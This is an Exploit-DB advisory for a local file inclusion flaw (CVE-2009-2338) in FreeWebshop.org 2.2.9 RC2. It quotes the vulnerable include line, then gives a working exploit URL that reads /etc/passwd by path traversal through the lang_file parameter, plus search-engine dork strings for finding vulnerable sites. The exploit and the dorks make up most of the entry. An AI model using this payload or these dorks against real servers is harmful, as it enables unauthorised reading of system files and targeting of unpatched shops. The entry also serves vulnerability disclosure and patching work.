FreeWebshop.org 2.2.9 RC2 lang_file Local File Inclusion Vulnerability

2009-04-15T00:00:00
ID EDB-ID:8446
Type exploitdb
Reporter ahmadbady
Modified 2009-04-15T00:00:00

Description

FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability. CVE-2009-2338. Webapps exploit for php platform

                                        
                                                             =-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::FreeWebshop.org 2..2.9_R2
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /includes/startmodules.inc.php line 31;

include ("./".$lang_file);

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
xpl:
/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-

dork:
"FreeWebshop.org | This is the Footer | ©2008-2009"
"FreeWebshop.org | This is the Footer |"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2009-04-15]